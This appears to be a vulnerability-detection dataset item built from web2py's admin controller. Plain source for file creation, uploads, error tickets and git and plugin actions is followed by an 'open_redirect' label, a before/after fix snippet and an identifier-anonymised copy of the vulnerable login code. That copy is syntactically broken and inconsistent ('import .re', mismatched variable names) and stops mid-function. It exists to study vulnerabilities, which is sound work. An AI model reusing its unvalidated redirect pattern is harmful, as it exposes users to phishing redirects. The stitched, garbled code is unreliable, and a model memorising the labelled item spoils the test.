        # sanitize: anything outside [\w./-] collapses to '_'
        filename = re.sub('[^\w./-]+', '_', request.vars.filename)
        if path[-7:] == '/rules/':
            # Handle plural rules files
            if len(filename) == 0:
                raise SyntaxError
            if not filename[-3:] == '.py':
                filename += '.py'
            # filename must look like plural_rules-<lang>.py
            lang = re.match('^plural_rules-(.*)\.py$', filename).group(1)
            langinfo = read_possible_languages(apath(app, r=request))[lang]
            text = dedent("""
            #!/usr/bin/env python
            # -*- coding: utf-8 -*-
            # Plural-Forms for %(lang)s (%(langname)s)
            nplurals=2 # for example, English language has 2 forms:
            # 1 singular and 1 plural
            # Determine plural_id for number *n* as sequence of positive
            # integers: 0,1,...
            # NOTE! For singular form ALWAYS return plural_id = 0
            get_plural_id = lambda n: int(n != 1)
            # Construct and return plural form of *word* using
            # *plural_id* (which ALWAYS>0). This function will be executed
            # for words (or phrases) not found in plural_dict dictionary.
            # By default this function simply returns word in singular:
            construct_plural_form = lambda word, plural_id: word
            """)[1:] % dict(lang=langinfo[0], langname=langinfo[1])
        elif path[-11:] == '/languages/':
            # Handle language files
            if len(filename) == 0:
                raise SyntaxError
            if not filename[-3:] == '.py':
                filename += '.py'
            path = os.path.join(apath(app, r=request), 'languages', filename)
            if not os.path.exists(path):
                safe_write(path, '')
            # create language xx[-yy].py file:
            findT(apath(app, r=request), filename[:-3])
            session.flash = T('language file "%(filename)s" created/updated',
                              dict(filename=filename))
            # language files are generated by findT, not written below
            redirect(request.vars.sender + anchor)
        elif path[-8:] == '/models/':
            # Handle python models
            if not filename[-3:] == '.py':
                filename += '.py'
            # len == 3 means the name was empty before '.py' was appended
            if len(filename) == 3:
                raise SyntaxError
            text = '# -*- coding: utf-8 -*-\n'
        elif path[-13:] == '/controllers/':
            # Handle python controllers
            if not filename[-3:] == '.py':
                filename += '.py'
            if len(filename) == 3:
                raise SyntaxError
            text = '# -*- coding: utf-8 -*-\n# %s\ndef index(): return dict(message="hello from %s")'
            text = text % (T('try something like'), filename)
        elif path[-7:] == '/views/':
            if request.vars.plugin and not filename.startswith('plugin_%s/' % request.vars.plugin):
                filename = 'plugin_%s/%s' % (request.vars.plugin, filename)
            # Handle template (html) views
            if filename.find('.') < 0:
                filename += '.html'
            extension = filename.split('.')[-1].lower()
            # len == 5 means the name was empty before '.html' was appended
            if len(filename) == 5:
                raise SyntaxError
            msg = T(
                'This is the %(filename)s template', dict(filename=filename))
            if extension == 'html':
                text = dedent("""
                   {{extend 'layout.html'}}
                   <h1>%s</h1>
                   {{=BEAUTIFY(response._vars)}}""" % msg)[1:]
            else:
                # non-html view: seed from generic.<ext> when available
                generic = os.path.join(path, 'generic.' + extension)
                if os.path.exists(generic):
                    text = read_file(generic)
                else:
                    text = ''
        elif path[-9:] == '/modules/':
            if request.vars.plugin and not filename.startswith('plugin_%s/' % request.vars.plugin):
                filename = 'plugin_%s/%s' % (request.vars.plugin, filename)
            # Handle python module files
            if not filename[-3:] == '.py':
                filename += '.py'
            if len(filename) == 3:
                raise SyntaxError
            text = dedent("""
                   #!/usr/bin/env python
                   # -*- coding: utf-8 -*-
                   from gluon import *\n""")[1:]
        elif (path[-8:] == '/static/') or (path[-9:] == '/private/'):
            if (request.vars.plugin and
                    not filename.startswith('plugin_%s/' % request.vars.plugin)):
                filename = 'plugin_%s/%s' % (request.vars.plugin, filename)
            text = ''
        else:
            # unknown target folder: bounce back without creating anything
            redirect(request.vars.sender + anchor)
        full_filename = os.path.join(path, filename)
        dirpath = os.path.dirname(full_filename)
        if not os.path.exists(dirpath):
            os.makedirs(dirpath)
        # refuse to overwrite an existing file
        if os.path.exists(full_filename):
            raise SyntaxError
        safe_write(full_filename, text)
        log_progress(app, 'CREATE', filename)
        if request.vars.dir:
            result = T('file "%(filename)s" created',
                       dict(filename=full_filename[len(path):]))
        else:
            session.flash = T('file "%(filename)s" created',
                              dict(filename=full_filename[len(path):]))
        vars = {}
        if request.vars.id:
            vars['id'] = request.vars.id
        if request.vars.app:
            vars['app'] = request.vars.app
        redirect(URL('edit',
                     args=[os.path.join(request.vars.location, filename)], vars=vars))
    except Exception as e:
        # redirect() raises HTTP; only real failures flash an error
        if not isinstance(e, HTTP):
            session.flash = T('cannot create file')

    if request.vars.dir:
        # created from the file tree: refresh the menu via web2py components
        response.flash = result
        response.headers['web2py-component-content'] = 'append'
        response.headers['web2py-component-command'] = "%s %s %s" % (
            "$.web2py.invalidate('#files_menu');",
            "load_file('%s');" % URL('edit', args=[app, request.vars.dir, filename]),
            "$.web2py.enableElement($('#form form').find($.web2py.formInputClickSelector));")
        return ''
    else:
        # NOTE(review): request.vars.sender is user-controlled; consider
        # validating it to avoid an open redirect.
        redirect(request.vars.sender + anchor)
def listfiles(app, dir, regexp='.*\.py$'):
    """Return sorted, slash-normalized file names under app/dir
    matching *regexp*, excluding editor backup (.bak) files."""
    folder = apath('%(app)s/%(dir)s/' % {'app': app, 'dir': dir}, r=request)
    entries = sorted(listdir(folder, regexp))
    return [entry.replace('\\', '/')
            for entry in entries
            if not entry.endswith('.bak')]
def editfile(path, file, vars=None, app=None):
    """Build an anchor element that opens *file* in the admin editor.

    Args:
        path: folder name (e.g. 'controllers') or first URL arg.
        file: file name to edit (also used as the link text).
        vars: optional query vars for the edit URL; when it contains an
            'app' key, args are (path, file), otherwise (app, path, file).
        app: application name, used only when 'app' is not in vars.

    Fix: the original used a mutable default ``vars={}``, which is shared
    across calls; ``None`` sentinel avoids accidental cross-call state.
    """
    vars = {} if vars is None else vars
    args = (path, file) if 'app' in vars else (app, path, file)
    url = URL('edit', args=args, vars=vars)
    return A(file, _class='editor_filelink', _href=url, _style='word-wrap: nowrap;')
def files_menu():
    """Build the collapsible per-folder file menu for the editor sidebar.

    Returns a dict with ``result_files``: one TAG[''] group per standard
    application folder, each holding a collapsible header LI plus a UL of
    edit links (one per file matching that folder's regexp).
    """
    # default to the 'welcome' scaffolding app when none is given
    app = request.vars.app or 'welcome'
    # folder name -> regexp of files worth listing in that folder
    dirs = [{'name': 'models', 'reg': '.*\.py$'},
            {'name': 'controllers', 'reg': '.*\.py$'},
            {'name': 'views', 'reg': '[\w/\-]+(\.\w+)+$'},
            {'name': 'modules', 'reg': '.*\.py$'},
            {'name': 'static', 'reg': '[^\.#].*'},
            {'name': 'private', 'reg': '.*\.py$'}]
    result_files = []
    for dir in dirs:
        # dots in file names become '__' so they are usable as DOM ids
        result_files.append(TAG[''](LI(dir['name'], _class="nav-header component", _onclick="collapse('" + dir['name'] + "_files');"),
                                    LI(UL(*[LI(editfile(dir['name'], f, dict(id=dir['name'] + f.replace('.', '__')), app), _style="overflow:hidden", _id=dir['name'] + "__" + f.replace('.', '__'))
                                            for f in listfiles(app, dir['name'], regexp=dir['reg'])],
                                          _class="nav nav-list small-font"),
                                       _id=dir['name'] + '_files', _style="display: none;")))
    return dict(result_files=result_files)
def upload_file():
    """Store an uploaded file inside an application folder.

    Enforces the extension expected by the destination folder
    (.py for models/modules/controllers/languages, .html for views),
    writes the file, logs progress, and redirects to the sender.
    """
    # CSRF guard: mutating admin requests must carry the session token.
    if request.vars and not request.vars.token == session.token:
        redirect(URL('logout'))
    try:
        filename = None
        app = get_app(name=request.vars.location.split('/')[0])
        path = apath(request.vars.location, r=request)
        if request.vars.filename:
            # sanitize a caller-supplied name
            filename = re.sub('[^\w\./]+', '_', request.vars.filename)
        else:
            # fall back to the uploaded file's own basename
            filename = os.path.split(request.vars.file.filename)[-1]
        # force the extension the destination folder expects
        if path[-8:] == '/models/' and not filename[-3:] == '.py':
            filename += '.py'
        if path[-9:] == '/modules/' and not filename[-3:] == '.py':
            filename += '.py'
        if path[-13:] == '/controllers/' and not filename[-3:] == '.py':
            filename += '.py'
        if path[-7:] == '/views/' and not filename[-5:] == '.html':
            filename += '.html'
        if path[-11:] == '/languages/' and not filename[-3:] == '.py':
            filename += '.py'
        filename = os.path.join(path, filename)
        dirpath = os.path.dirname(filename)
        if not os.path.exists(dirpath):
            os.makedirs(dirpath)
        data = request.vars.file.file.read()
        lineno = count_lines(data)
        safe_write(filename, data, 'wb')
        log_progress(app, 'UPLOAD', filename, lineno)
        session.flash = T('file "%(filename)s" uploaded',
                          dict(filename=filename[len(path):]))
    except Exception:
        # best-effort: report failure but still redirect below
        if filename:
            d = dict(filename=filename[len(path):])
        else:
            d = dict(filename='unknown')
        session.flash = T('cannot upload file "%(filename)s"', d)
    # NOTE(review): request.vars.sender is user-controlled; consider
    # validating it to avoid an open redirect.
    redirect(request.vars.sender)
def errors():
    """Error-ticket browser.

    The second URL arg selects backend and view:
      * 'new'   -- file-based tickets grouped by md5 of the traceback
      * 'dbnew' -- DB-stored tickets, grouped the same way
      * 'dbold' -- DB-stored tickets as a flat, newest-first list
      * other   -- file-based tickets as a flat, newest-first list
    Request vars named 'delete_<hash-or-id>' delete matching tickets.

    Fix: the 'dbnew' branch hashed ``error['traceback']`` directly, which
    raises TypeError on Python 3 (md5 requires bytes); it now wraps the
    value in ``to_bytes`` exactly like the 'new' branch.
    """
    import operator
    import os
    import hashlib
    app = get_app()
    if is_gae:
        # GAE has no local error files; force one of the DB-backed views.
        method = 'dbold' if ('old' in
                             (request.args(1) or '')) else 'dbnew'
    else:
        method = request.args(1) or 'new'
    db_ready = {}
    db_ready['status'] = get_ticket_storage(app)
    db_ready['errmessage'] = T(
        "No ticket_storage.txt found under /private folder")
    db_ready['errlink'] = "http://web2py.com/books/default/chapter/29/13#Collecting-tickets"
    if method == 'new':
        errors_path = apath('%s/errors' % app, r=request)

        delete_hashes = []
        for item in request.vars:
            if item[:7] == 'delete_':
                delete_hashes.append(item[7:])

        hash2error = dict()

        for fn in listdir(errors_path, '^[a-fA-F0-9.\-]+$'):
            fullpath = os.path.join(errors_path, fn)
            if not os.path.isfile(fullpath):
                continue
            try:
                fullpath_file = safe_open(fullpath, 'rb')
                try:
                    error = pickle.load(fullpath_file)
                finally:
                    fullpath_file.close()
            except IOError:
                continue
            except EOFError:
                # truncated / partially-written ticket file: skip it
                continue

            hash = hashlib.md5(to_bytes(error['traceback'])).hexdigest()

            if hash in delete_hashes:
                os.unlink(fullpath)
            else:
                try:
                    hash2error[hash]['count'] += 1
                except KeyError:
                    error_lines = error['traceback'].split("\n")
                    last_line = error_lines[-2] if len(error_lines) > 1 else 'unknown'
                    error_causer = os.path.split(error['layer'])[1]
                    hash2error[hash] = dict(count=1, pickel=error,
                                            causer=error_causer,
                                            last_line=last_line,
                                            hash=hash, ticket=fn)
        decorated = [(x['count'], x) for x in hash2error.values()]
        decorated.sort(key=operator.itemgetter(0), reverse=True)
        return dict(errors=[x[1] for x in decorated], app=app, method=method, db_ready=db_ready)
    elif method == 'dbnew':
        errors_path = apath('%s/errors' % app, r=request)
        tk_db, tk_table = get_ticket_storage(app)

        delete_hashes = []
        for item in request.vars:
            if item[:7] == 'delete_':
                delete_hashes.append(item[7:])

        hash2error = dict()
        # NOTE: ticket_data is unpickled; tickets are produced locally, but
        # pickle.loads must never be fed untrusted input.
        for fn in tk_db(tk_table.id > 0).select():
            try:
                error = pickle.loads(fn.ticket_data)
                # BUGFIX: md5 needs bytes -- wrap in to_bytes like the
                # 'new' branch (was a TypeError on Python 3 str tracebacks).
                hash = hashlib.md5(to_bytes(error['traceback'])).hexdigest()

                if hash in delete_hashes:
                    tk_db(tk_table.id == fn.id).delete()
                    tk_db.commit()
                else:
                    try:
                        hash2error[hash]['count'] += 1
                    except KeyError:
                        error_lines = error['traceback'].split("\n")
                        last_line = error_lines[-2]
                        error_causer = os.path.split(error['layer'])[1]
                        hash2error[hash] = dict(count=1,
                                                pickel=error, causer=error_causer,
                                                last_line=last_line, hash=hash,
                                                ticket=fn.ticket_id)
            except AttributeError as e:
                # malformed row: drop it from the ticket table
                tk_db(tk_table.id == fn.id).delete()
                tk_db.commit()

        decorated = [(x['count'], x) for x in hash2error.values()]
        decorated.sort(key=operator.itemgetter(0), reverse=True)
        return dict(errors=[x[1] for x in decorated], app=app,
                    method=method, db_ready=db_ready)
    elif method == 'dbold':
        tk_db, tk_table = get_ticket_storage(app)
        for item in request.vars:
            if item[:7] == 'delete_':
                tk_db(tk_table.ticket_id == item[7:]).delete()
                tk_db.commit()
        tickets_ = tk_db(tk_table.id > 0).select(tk_table.ticket_id,
                                                 tk_table.created_datetime,
                                                 orderby=~tk_table.created_datetime)
        tickets = [row.ticket_id for row in tickets_]
        times = dict([(row.ticket_id, row.created_datetime) for
                      row in tickets_])

        return dict(app=app, tickets=tickets, method=method,
                    times=times, db_ready=db_ready)
    else:
        for item in request.vars:
            # delete_all rows doesn't contain any ticket
            # Remove anything else as requested
            # NOTE(review): the literal "delete_all}" (trailing brace) looks
            # odd but is preserved as-is -- confirm against the view.
            if item[:7] == 'delete_' and (not item == "delete_all}"):
                os.unlink(apath('%s/errors/%s' % (app, item[7:]), r=request))
        # newest tickets first, by file modification time
        func = lambda p: os.stat(apath('%s/errors/%s' %
                                       (app, p), r=request)).st_mtime
        tickets = sorted(
            listdir(apath('%s/errors/' % app, r=request), '^\w.*'),
            key=func,
            reverse=True)

        return dict(app=app, tickets=tickets, method=method, db_ready=db_ready)
def get_ticket_storage(app):
    """Return (db, table) for DB-stored tickets, or False when the app
    has no ticket_storage.txt and no GAE datastore fallback applies."""
    private_folder = apath('%s/private' % app, r=request)
    ticket_file = os.path.join(private_folder, 'ticket_storage.txt')
    if os.path.exists(ticket_file):
        # connection string lives on the first (only) line of the file
        db_string = safe_read(ticket_file)
        db_string = db_string.strip().replace('\r', '').replace('\n', '')
    elif is_gae:
        # use Datastore as fallback if there is no ticket_file
        db_string = "google:datastore"
    else:
        return False
    tickets_table = 'web2py_ticket'
    tablename = tickets_table + '_' + app
    db_path = apath('%s/databases' % app, r=request)
    ticketsdb = DAL(db_string, folder=db_path, auto_import=True)
    if not ticketsdb.get(tablename):
        # first use: create the per-application ticket table
        ticketsdb.define_table(
            tablename,
            Field('ticket_id', length=100),
            Field('ticket_data', 'text'),
            Field('created_datetime', 'datetime'),
        )
    return ticketsdb, ticketsdb.get(tablename)
def make_link(path):
    """Return an editor link for *path* when it points at an editable
    application file (controller/model/view), otherwise ''."""
    candidate = path.replace('\\', '/')
    if not (os.path.isabs(candidate) and os.path.isfile(candidate)):
        return ''
    folder, filename = os.path.split(candidate)
    base, ext = os.path.splitext(filename)
    app = get_app()
    # folder name -> extension that folder is allowed to contain
    editable = {'controllers': '.py', 'models': '.py', 'views': '.html'}
    for key in editable.keys():
        check_extension = folder.endswith("%s/%s" % (app, key))
        if ext.lower() == editable[key] and check_extension:
            anchor = A('"' + candidate + '"',
                       _href=URL(r=request,
                                 f='edit/%s/%s/%s' % (app, key, filename)))
            return to_native(anchor.xml())
    return ''
def make_links(traceback):
    """Rewrite quoted file paths inside *traceback* as editor links.

    Splits on double quotes; each odd segment is a candidate path. When a
    path is linkable the surrounding quotes are dropped and the following
    segment is appended verbatim; otherwise the quote is restored.
    """
    pieces = traceback.split('"')
    # str.split always yields at least one element, but keep the guard
    result = (len(pieces) != 0) and pieces[0] or ''
    idx = 1
    total = len(pieces)
    while idx < total:
        link = make_link(pieces[idx])
        if link == '':
            # not an editable file: restore the opening quote
            result += '"' + pieces[idx]
        else:
            result += link
            if idx + 1 < total:
                # consume the text after the closing quote as well
                result += pieces[idx + 1]
            idx += 1
        idx += 1
    return result
class TRACEBACK(object):
    """Wrap an error traceback as linkified, escaped XML."""

    def __init__(self, text):
        """Linkify *text* eagerly and store the resulting markup."""
        self.s = make_links(CODE(text).xml())

    def xml(self):
        """Return the pre-computed xml markup."""
        return self.s
def ticket():
    """Render a file-stored error ticket (args: app, ticket id)."""
    if len(request.args) != 2:
        session.flash = T('invalid ticket')
        redirect(URL('site'))
    app = get_app()
    myversion = request.env.web2py_version
    ticket = request.args[1]
    err = RestrictedError()
    err.load(request, app, ticket)
    return dict(app=app,
                ticket=ticket,
                output=err.output,
                traceback=(err.traceback and TRACEBACK(err.traceback)),
                snapshot=err.snapshot,
                code=err.code,
                layer=err.layer,
                myversion=myversion)
def ticketdb():
    """Render a DB-stored error ticket, reusing the file-ticket view."""
    if len(request.args) != 2:
        session.flash = T('invalid ticket')
        redirect(URL('site'))
    app = get_app()
    myversion = request.env.web2py_version
    ticket = request.args[1]
    err = RestrictedError()
    # point the loader at the ticket database before loading
    request.tickets_db = get_ticket_storage(app)[0]
    err.load(request, app, ticket)
    response.view = 'default/ticket.html'
    return dict(app=app,
                ticket=ticket,
                output=err.output,
                traceback=(err.traceback and TRACEBACK(err.traceback)),
                snapshot=err.snapshot,
                code=err.code,
                layer=err.layer,
                myversion=myversion)
def error():
    """Deliberately raise an exception so a ticket is generated (testing aid)."""
    message = 'admin ticket generator at your service'
    raise RuntimeError(message)
def update_languages():
    """Rescan the application and regenerate its static-string language files."""
    appname = get_app()
    update_all_languages(apath(appname, r=request))
    session.flash = T('Language files (static strings) updated')
    redirect(URL('design', args=appname, anchor='languages'))
def user():
    """Auth endpoint: active only in multi-user mode; the very first
    registered account skips the approval requirement."""
    if not MULTI_USER_MODE:
        return dict(form=T("Disabled"))
    if not db(db.auth_user).count():
        # no users yet: let the first account register without approval
        auth.settings.registration_requires_approval = False
    return dict(form=auth())
def reload_routes():
    """ Reload routes.py so URL-rewrite changes take effect without a restart """
    gluon.rewrite.load()
    redirect(URL('site'))
def manage_students():
    # Admin grid over auth_user; restricted to managers in multi-user mode.
    if not (MULTI_USER_MODE and is_manager()):
        session.flash = T('Not Authorized')
        redirect(URL('site'))
    # expose the registration key so a manager can approve/block accounts
    db.auth_user.registration_key.writable = True
    grid = SQLFORM.grid(db.auth_user)
    # locals() is returned, so the view depends on the name 'grid'
    return locals()
def bulk_register():
    # Bulk-create student accounts from a newline-separated email list;
    # restricted to managers in multi-user mode.
    if not (MULTI_USER_MODE and is_manager()):
        session.flash = T('Not Authorized')
        redirect(URL('site'))
    form = SQLFORM.factory(Field('emails', 'text'))
    if form.process().accepted:
        emails = [x.strip() for x in form.vars.emails.split('\n') if x.strip()]
        n = 0
        for email in emails:
            # skip addresses that already have an account
            if not db.auth_user(email=email):
                n += db.auth_user.insert(email=email) and 1 or 0
        session.flash = T('%s students registered', n)
        redirect(URL('site'))
    # locals() is returned, so the view depends on the name 'form'
    return locals()
# Begin experimental stuff need fixes:
# 1) should run in its own process - cannot os.chdir
# 2) should not prompt user at console
# 3) should give option to force commit and not require manual merge
def git_pull():
    """Fetch and pull the application's git origin after confirmation.

    Requires gitpython (have_git); every outcome flashes a message and
    redirects back to the site page.
    """
    app = get_app()
    if not have_git:
        session.flash = GIT_MISSING
        redirect(URL('site'))
    dialog = FORM.confirm(T('Pull'),
                          {T('Cancel'): URL('site')})
    if dialog.accepted:
        try:
            repo = git.Repo(os.path.join(apath(r=request), app))
            origin = repo.remotes.origin
            origin.fetch()
            origin.pull()
            session.flash = T("Application updated via git pull")
            redirect(URL('site'))

        except git.CheckoutError:
            session.flash = T("Pull failed, certain files could not be checked out. Check logs for details.")
            redirect(URL('site'))

        except git.UnmergedEntriesError:
            session.flash = T("Pull is not possible because you have unmerged files. Fix them up in the work tree, and then try again.")
            redirect(URL('site'))

        except git.GitCommandError:
            session.flash = T(
                "Pull failed, git exited abnormally. See logs for details.")
            redirect(URL('site'))

        except AssertionError:
            # gitpython raises AssertionError for some unmerged states
            session.flash = T("Pull is not possible because you have unmerged files. Fix them up in the work tree, and then try again.")
            redirect(URL('site'))

    elif 'cancel' in request.vars:
        redirect(URL('site'))

    return dict(app=app, dialog=dialog)
def git_push():
    """Commit all application changes and push to the git origin.

    Requires gitpython (have_git); the changelog form field becomes the
    commit message.
    """
    app = get_app()
    if not have_git:
        session.flash = GIT_MISSING
        redirect(URL('site'))
    form = SQLFORM.factory(Field('changelog', requires=IS_NOT_EMPTY()))
    form.element('input[type=submit]')['_value'] = T('Push')
    form.add_button(T('Cancel'), URL('site'))
    form.process()
    if form.accepted:
        try:
            repo = git.Repo(os.path.join(apath(r=request), app))
            index = repo.index
            # stage everything under the application folder
            index.add([apath(r=request) + app + '/*'])
            new_commit = index.commit(form.vars.changelog)
            origin = repo.remotes.origin
            origin.push()
            session.flash = T(
                "Git repo updated with latest application changes.")
            redirect(URL('site'))
        except git.UnmergedEntriesError:
            session.flash = T("Push failed, there are unmerged entries in the cache. Resolve merge issues manually and try again.")
            redirect(URL('site'))
    return dict(app=app, form=form)
def plugins():
    """List plugins published on web2pyslices.com.

    The downloaded catalogue is cached in the session; on download
    failure an empty list is cached and a flash message is shown.
    """
    app = request.args(0)
    from gluon.serializers import loads_json
    if not session.plugins:
        try:
            rawlist = urlopen("http://www.web2pyslices.com/" +
                              "public/api.json/action/list/content/Package?package" +
                              "_type=plugin&search_index=false").read()
            session.plugins = loads_json(rawlist)
        except:
            # best-effort: keep the page working with an empty catalogue
            response.flash = T('Unable to download the list of plugins')
            session.plugins = []
    return dict(plugins=session.plugins["results"], app=request.args(0))
def install_plugin():
    """Download a w2p plugin package from *source* and install it into *app*.

    Requires request.vars.source (http/https URL) and a target app in
    request.args(0); installation happens only after form confirmation.
    """
    app = request.args(0)
    source = request.vars.source
    plugin = request.vars.plugin
    if not (source and app):
        raise HTTP(500, T("Invalid request"))
    # make sure no XSS attacks in source
    # (only http/https schemes may be fetched)
    if not source.lower().split('://')[0] in ('http','https'):
        raise HTTP(500, T("Invalid request"))
    form = SQLFORM.factory()
    result = None
    if form.process().accepted:
        # get w2p plugin
        if "web2py.plugin." in source:
            # derive the canonical file name from the source URL
            filename = "web2py.plugin.%s.w2p" % \
                source.split("web2py.plugin.")[-1].split(".w2p")[0]
        else:
            filename = "web2py.plugin.%s.w2p" % cleanpath(plugin)
        if plugin_install(app, urlopen(source),
                          request, filename):
            session.flash = T('New plugin installed: %s', filename)
        else:
            session.flash = \
                T('unable to install plugin "%s"', filename)
        redirect(URL(f="plugins", args=[app, ]))
    return dict(form=form, app=app, plugin=plugin, source=source)
| open_redirect | {
"code": [
"from gluon.tools import Config",
" send = request.vars.send"
],
"line_no": [
15,
121
]
} | {
"code": [
"from gluon.tools import Config, prevent_open_redirect",
" send = prevent_open_redirect(request.vars.send)"
],
"line_no": [
15,
121
]
} |
VAR_0 = True
VAR_1 = 1000
if VAR_0:
if is_mobile:
VAR_43.view = VAR_43.view.replace('default/', 'default.mobile/')
VAR_43.menu = []
import .re
from gluon.admin import *
from gluon.fileutils import .abspath, read_file, write_file
from gluon.utils import web2py_uuid
from gluon.tools import Config
from gluon.compileapp import .find_exposed_functions
from glob import glob
from gluon._compat import .iteritems, PY2, pickle, xrange, urlopen, to_bytes, StringIO, to_native, reload
import gluon.rewrite
import .shutil
import platform
try:
import git
if git.__version__ < '0.3.1':
raise ImportError("Your VAR_25 of git is %VAR_140. Upgrade to 0.3.1 or better." % git.__version__)
VAR_19 = True
except ImportError as VAR_114:
VAR_19 = False
VAR_117 = 'Requires gitpython module, but not VAR_212 or incompatible VAR_25: %s' % VAR_114
from gluon.languages import (read_possible_languages, read_dict, write_dict,
read_plural_dict, write_plural_dict)
if DEMO_MODE and request.function in ['change_password', 'pack',
'pack_custom', 'pack_plugin', 'upgrade_web2py', 'uninstall',
'cleanup', 'compile_app', 'remove_compiled_app', 'delete',
'delete_plugin', 'create_file', 'upload_file', 'update_languages',
'reload_routes', 'git_push', 'git_pull', 'install_plugin']:
session.flash = T('disabled in demo mode')
redirect(URL('site'))
if is_gae and request.function in ('edit', 'edit_language',
'edit_plurals', 'update_languages', 'create_file', 'install_plugin'):
session.flash = T('disabled in GAE mode')
redirect(URL('site'))
if not is_manager() and request.function in ['change_password', 'upgrade_web2py']:
session.flash = T('disabled in multi FUNC_50 mode')
redirect(URL('site'))
if FILTER_APPS and request.args(0) and not request.args(0) in FILTER_APPS:
session.flash = T('disabled in demo mode')
redirect(URL('site'))
if not session.token:
session.token = web2py_uuid()
def FUNC_0(VAR_2):
return len([VAR_69 for VAR_69 in VAR_2.split('\n') if VAR_69.strip() and not VAR_69.startswith('#')])
def FUNC_1(VAR_3, VAR_4='EDIT', VAR_5=None, VAR_6=0):
VAR_20 = os.path.join(apath(VAR_3, VAR_122=request), 'progress.log')
VAR_21 = str(request.now)[:19]
if not os.path.exists(VAR_20):
FUNC_2(VAR_20, 'w').write('[%VAR_140] START\n' % VAR_21)
if VAR_5:
FUNC_2(VAR_20, 'a').write(
'[%VAR_140] %VAR_140 %VAR_140: %s\n' % (VAR_21, VAR_4, VAR_5, VAR_6))
def FUNC_2(VAR_7, VAR_8):
if (DEMO_MODE or is_gae) and ('w' in VAR_8 or 'a' in VAR_8):
class CLASS_2:
def FUNC_64(self, VAR_2):
pass
def FUNC_65(self):
pass
return CLASS_2()
if PY2 or 'b' in VAR_8:
return open(VAR_7, VAR_8)
else:
return open(VAR_7, VAR_8, encoding="utf8")
def FUNC_3(VAR_7, VAR_8='r'):
VAR_22 = FUNC_2(VAR_7, VAR_8)
try:
return VAR_22.read()
finally:
VAR_22.close()
def FUNC_4(VAR_7, VAR_9, VAR_8='w'):
VAR_22 = FUNC_2(VAR_7, VAR_8)
try:
VAR_22.write(VAR_9)
finally:
VAR_22.close()
def FUNC_5(VAR_10=None):
VAR_3 = VAR_10 or request.args(0)
if (VAR_3 and os.path.exists(apath(VAR_3, VAR_122=request)) and
(not MULTI_USER_MODE or is_manager() or
db(db.app.name == VAR_3)(db.app.owner == auth.user.id).count())):
return VAR_3
session.flash = T('App does not exist or you are not authorized')
redirect(URL('site'))
def VAR_197():
VAR_23 = request.vars.send
if DEMO_MODE:
session.authorized = True
session.last_time = t0
if not VAR_23:
send = URL('site')
if session.authorized:
redirect(VAR_23)
elif failed_login_count() >= allowed_number_of_attempts:
time.sleep(2 ** allowed_number_of_attempts)
raise HTTP(403)
elif request.vars.password:
if verify_password(request.vars.password[:1024]):
session.authorized = True
login_record(True)
if CHECK_VERSION:
session.check_version = True
else:
session.check_version = False
session.last_time = t0
if isinstance(VAR_23, list): # ## why does this happen?
VAR_23 = str(VAR_23[0])
redirect(VAR_23)
else:
VAR_210 = login_record(False)
if VAR_210 >= allowed_number_of_attempts:
VAR_43.flash = \
T('admin disabled because too many invalid login attempts')
elif VAR_210 == allowed_number_of_attempts - 1:
VAR_43.flash = \
T('You have one more login attempt before you are locked out')
else:
VAR_43.flash = T('invalid password.')
return dict(VAR_23=send)
def FUNC_7():
session.forget()
session._unlock(VAR_43)
VAR_24, VAR_25 = check_new_version(request.env.web2py_version,
WEB2PY_VERSION_URL)
if VAR_24 in (-1, -2):
return A(T('Unable to check for upgrades'), _href=WEB2PY_URL)
elif not VAR_24:
return A(T('web2py is up to date'), _href=WEB2PY_URL)
elif platform.system().lower() in ('windows', 'win32', 'win64') and os.path.exists("web2py.exe"):
return SPAN('You should upgrade to %s' % VAR_25.split('(')[0])
else:
return sp_button(URL('upgrade_web2py'), T('upgrade VAR_21 to %s') % VAR_25.split('(')[0])
def FUNC_8():
session.authorized = None
if MULTI_USER_MODE:
redirect(URL('user/logout'))
redirect(URL('index'))
def FUNC_9():
if session.pam_user:
session.flash = T(
'PAM authenticated FUNC_50, cannot change password here')
redirect(URL('site'))
VAR_26 = SQLFORM.factory(Field('current_admin_password', 'password'),
Field('new_admin_password',
'password', requires=IS_STRONG()),
Field('new_admin_password_again', 'password'),
VAR_144="span4 well")
if VAR_26.accepts(request.vars):
if not verify_password(request.vars.current_admin_password):
VAR_26.errors.current_admin_password = T('invalid password')
elif VAR_26.vars.new_admin_password != VAR_26.vars.new_admin_password_again:
VAR_26.errors.new_admin_password_again = T('no match')
else:
VAR_15 = abspath('parameters_%VAR_140.py' % request.env.server_port)
FUNC_4(VAR_15, 'password="%s"' % CRYPT()(
request.vars.new_admin_password)[0])
session.flash = T('password changed')
redirect(URL('site'))
return dict(VAR_26=form)
def FUNC_10():
VAR_27 = request.env.web2py_version
VAR_28 = 'file' in request.vars or 'appurl' in request.vars
class CLASS_1(object):
def __call__(self, VAR_9):
if not re.compile('^\w+$').match(VAR_9):
return (VAR_9, T('Invalid application name'))
if not request.vars.overwrite and \
os.path.exists(os.path.join(apath(VAR_122=request), VAR_9)):
return (VAR_9, T('Application exists already'))
return (VAR_9, None)
VAR_29 = CLASS_1()
VAR_30 = SQLFORM.factory(Field('name', requires=VAR_29),
table_name='appcreate')
VAR_31 = SQLFORM.factory(Field('name', requires=VAR_29),
Field('file', 'upload', uploadfield=False),
Field('url'),
Field('overwrite', 'boolean'),
table_name='appupdate')
VAR_30.process()
VAR_31.process()
if DEMO_MODE:
pass
elif VAR_30.accepted:
VAR_174 = cleanpath(VAR_30.vars.name)
VAR_175, VAR_125 = app_create(VAR_174, request, info=True)
if VAR_175:
if MULTI_USER_MODE:
db.app.insert(VAR_10=VAR_174, owner=auth.user.id)
FUNC_1(VAR_174)
session.flash = T('new application "%s" created', VAR_174)
gluon.rewrite.load()
redirect(URL('design', VAR_98=VAR_174))
else:
session.flash = \
DIV(T('unable to create application "%s"', VAR_174),
PRE(VAR_125))
redirect(URL(VAR_122=request))
elif VAR_31.accepted:
if (VAR_31.vars.url or '').endswith('.git'):
if not VAR_19:
session.flash = VAR_117
redirect(URL(VAR_122=request))
VAR_211 = os.path.join(apath(VAR_122=request), VAR_31.vars.name)
try:
VAR_217 = git.Repo.clone_from(VAR_31.vars.url, VAR_211)
session.flash = T('new application "%s" imported',
VAR_31.vars.name)
gluon.rewrite.load()
except git.GitCommandError as err:
session.flash = T('Invalid git repository specified.')
redirect(URL(VAR_122=request))
elif VAR_31.vars.url:
try:
VAR_221 = urlopen(VAR_31.vars.url)
if VAR_221.code == 404:
raise Exception("404 VAR_16 not found")
except Exception as VAR_114:
session.flash = \
DIV(T('Unable to download VAR_3 because:'), PRE(repr(VAR_114)))
